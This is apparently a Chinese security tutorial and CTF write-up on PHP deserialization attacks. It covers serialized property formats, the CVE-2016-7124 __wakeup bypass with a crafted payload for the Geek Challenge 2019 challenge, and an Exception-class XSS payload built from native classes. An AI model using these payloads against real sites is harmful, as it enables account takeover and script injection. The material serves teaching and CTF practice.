WEB攻防- PHP反序列化&属性权限特征&原生类 TIPS&字符串逃逸&CVE 绕过漏洞

目录

PHP-属性权限特征-共有&私有&保护

PHP-绕过漏洞-CVE&字符串逃逸

PHP-原生类获取&利用&配合

原生类利用简单案例Demo-XSS


PHP-属性权限特征-共有&私有&保护

1、对象变量权限:

public(公共的):在本类内部、外部类、子类都可以访问

protect(受保护的):只有本类或子类或父类中可以访问

private(私人的):只有本类内部可以使用

2、序列化数据显示:

public 属性序列化的时候格式是正常成员名

private 属性序列化的时候格式是%00 类名%00 成员名

protect 属性序列化的时候格式是%00*%00 成员名

%00代表 NULL 字节,下面代码为了直观显示,使用var_export函数进行转义显示未\0

PHP-绕过漏洞-CVE-2016-7124

1、CVE-2016-7124(__wakeup 绕过)

漏洞编号:CVE-2016-7124

影响版本:PHP 5<5.6.25; PHP 7<7.0.10

漏洞危害:如存在__wakeup 方法,调用 unserilize()方法前则先调用__wakeup 方

法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

php 复制代码
<?php
header("Content-type: text/html; charset=utf-8");
//public private protected 说明
class test{
    public $name;
    private $age;
    protected $sex;

    public function __construct($name,$age,$sex){
        echo "__construct被调用\n";
    }

    public function __wakeup(){
        echo '反序列化时__wakeup被执行!!!';
    }
}

unserialize($_GET['x']);

正常情况下在反序列化时,__weakeup被调用

但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

测试使用的php版本在漏洞范围内

案例:

极客大挑战 2019PHP

1、下载源码www.zip分析,触发 flag 条件

2、从代码上看,需要username=admin才能输出flag,但是由于反序列化必然会执行__wakeup 强制改变 username 值,且通过传入select参数反序列化

3、利用语言漏洞绕过 CVE-2016-7124,随便传入一个值可以看到php版本在漏洞范围内

4、构造 payload 后 修改满足漏洞条件触发

payload:O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

注意改变属性个数

PHP-原生类获取&利用&配合

原生类(Native class)是指在编程语言的核心库或标准库中提供的类,这些类是语言本身提供的,而不是由用户自定义的类。原生类通常包含语言内置的功能和特性,用于解决常见的编程任务和操作。

PHP原生类使用场景:在代码中没有看到魔术方法的情况下使用的,如果对方环境没有开启相关模块功能,那么是没用的。

使用脚本在本地生成原生类,需要再php.ini文件中尽可能打开多的模块,这样可以生成更多可利用的原生类。代码如下:

php 复制代码
<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__toString',
            '__wakeup',
            '__call',
            '__callStatic',
            '__get',
            '__set',
            '__isset',
            '__unset',
            '__invoke',
            '__set_state'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}

找到php.ini文件

原生类利用简单案例Demo-XSS

php 复制代码
<?php
highlight_file(__file__);
$a = unserialize($_GET['k']);
echo $a;
?>

思路:

1.先看能触发的魔术方法-echo能够触发__toString方法

2.代码中没写魔术方法调用逻辑,那就需要用到原生类

3.使用魔术方法的原生类去利用

4.获取魔术方法的原生类(使用脚本去生成,生成多少与当前环境模块开关有关

默认的原生类生成脚本有太多原生类和方法了,这里只保留__toString方法,生成其有的原生类)

创建一个异常对象,并序列化

php 复制代码
<?php
$a=new Exception("<script>alert('xiaodi')</script>");
echo urlencode(serialize($a));
?>

代码中echo一个反序列化的对象,是会异常的,php中对象不能转换为字符串,故而形成了pop链。

创建异常对象(产生异常返回xss代码) -> 传入序列化后的异常对象 -> echo 反序列化得到异常对象 -> 对象不能转字符串(异常返回xss代码) -> echo触发toString将返回的xss代码输出被浏览器渲染

相关推荐
web守墓人3 分钟前
【python】uv解决依赖安装缓慢的问题
开发语言·python·uv
geovindu1 小时前
CSharp: Bridge Pattern
开发语言·后端·桥接模式·结构型模式
এ慕ོ冬℘゜2 小时前
深入 JavaScript BOM:掌握 window 对象的窗口控制魔法
开发语言·javascript·ecmascript
2501_941982052 小时前
企业微信二次开发:如何用 Python 搭建通用的 Webhook 实时消息接收
开发语言·python·企业微信
逝水无殇2 小时前
C# 特性详解
开发语言·后端·c#
灵晔君2 小时前
【C++】二叉搜索树
开发语言·c++
LongtengGensSupreme3 小时前
C#图像内存高速拷贝:使用Marshal.AllocHGlobal与ArrayPool实现内存拷贝的几个方法
开发语言·数码相机·c#
Java面试题总结3 小时前
Python,单引号和双引号有何区别
开发语言·python
鱼子星_3 小时前
【C++】内存管理:内存分布,new/delete的使用及细节处理,new/delete的底层,定位new表达式
开发语言·c++·笔记
学逆向的3 小时前
汇编——函数
开发语言·汇编·网络安全